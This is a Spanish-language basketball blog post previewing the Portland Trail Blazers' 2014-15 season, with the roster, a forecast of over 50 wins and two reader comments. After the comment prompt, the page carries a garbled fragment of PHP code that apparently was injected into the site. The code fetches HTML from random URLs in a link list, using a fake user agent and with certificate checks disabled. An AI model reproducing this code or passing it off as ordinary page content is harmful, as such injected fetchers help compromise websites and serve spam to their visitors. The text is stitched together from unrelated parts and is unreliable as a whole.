Portland TrailBlazers 2014-2015: La levedad del ser… o no ser

24 de October de 2014 por TheDeerHunter

La realidad llama a la puerta y, tras una excelente campaña, la ambición de Aldridge y Lillard no va a esperar eternamente a que la franquicia se decida a apostar decididamente por ellos. El reloj biológico ganador de ambos está pidiendo a gritos mucho más que los leves esfuerzos que se han realizado para mejorar la competitividad de la plantilla. El Oeste tampoco espera a nadie y no pisar el acelerador puede significar dificultades incluso para asegurar Playoffs. Éste no es un juego para timoratos ni pusilánimes. O comes o eres comido.

lamarcus aldridge damian lillard

Movimientos clave

Valoramos positivamente la llegada de dos viejos roqueros como Steve Blake y Chris Kaman para reforzar esa deficiente segunda unidad. Sin embargo, como temíamos, su sexto hombre, Mo Williams, terminó saliendo destino Minneapolis. Claramente insuficiente. Tras dos temporadas con el peor banco de la liga hay que buscar soluciones. Si no han venido del mercado la consigna es clara. Stotts debe dar rendimiento a lo de casa e insistir en la tendencia que ya insinuó el año pasado de tratar de controlar la carga de minutos de los titulares. Vamos a ver si éste puede ser el año de los Barton, McCollum, Robinson…

Qué esperamos de ellos

Con estos mimbres, repetir lo del año pasado sería objetivamente un éxito. Otra cosa es que terminar barridos de nuevo dejaría un poso moral bastante negativo. El objetivo debería ser consolidarse en primera ronda, dando buena imagen y logrando mayor participación de los jóvenes que se les ha quedado por el camino. Se deben sentar las bases para intentar un salto de calidad el verano próximo y asumir la condición de aspirantes al trono del Oeste. Si no se interioriza esa urgencia el proyecto corre serio riesgo de diluirse.

Pronóstico

Por encima de las 50 victorias. Primera ronda.

Plantilla

PG: Damian Lillard, Steve Blake
SG: Wesley Matthews, Will Barton, CJ McCollum, Allen Crabbe
SF: Nicolas Batum, Dorell Wright
PF: LaMarcus Aldridge, Thomas Robinson, Víctor Claver
C: Robin Lopez, Chris Kaman, Joel Freeland, Meyers Leonard

Bajas: Earl Watson, Mo Williams (MIN)

Comenta

2 comentarios a esta entrada

  1. Vader dice:
    #1

    Tendrian que estar todo el año pendientes del mercado por si se presenta alguna oportunidad de dar un salto de calidad.

    Ir a por Marc Gasol si los Grizzlies intuyen que no renovará o algo así “importante”. Deben tener primeras rondas para usar y hasta la dupla Mathews Batum se podria traspasar si es para pescar algo de calibre. Necesitan dar un pequeño salto sólo, pero el más difícil, el que te convierte en aspirante.

    Saludos

      Citar

  2. Viva_Dirk dice:
    #2

    El dúo LaMarcus-Lillard es de los más molones de la liga, además de molar ambos han demostrado ser jugadores muy competitivos y capaces de mirar por el equipo sin pestañear. En Lillard tienen además un aniquilador en los minutos finales, pero Vader tiene razón en que les falta potencia en el resto de la plantilla. A Batum no lo tocaría, me parece un tercer hombre perfecto para esa pareja, es un gran defensor y se ha echado el equipo a la espalda en más de una ocasión.

    Luego Matthews y Lopez han cumplido incluso por encima de lo esperado, pero son lo que son. Con estos y algún joven tipo McCollum o Robinson además de las rondas podrían intentar ir a por un jugador superior, de primeras me salen Monroe(si quiere renovar en Portland), o Horford a parte del mencionado Marc. O pescar algún refuerzo barato tipo Kevin Martin. Otra opción es darles más oportunidades a los jóvenes al menos en la RS para que los titulares lleguen mejor a playoffs y al mismo tiempo los otros lleguen con más confianza.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>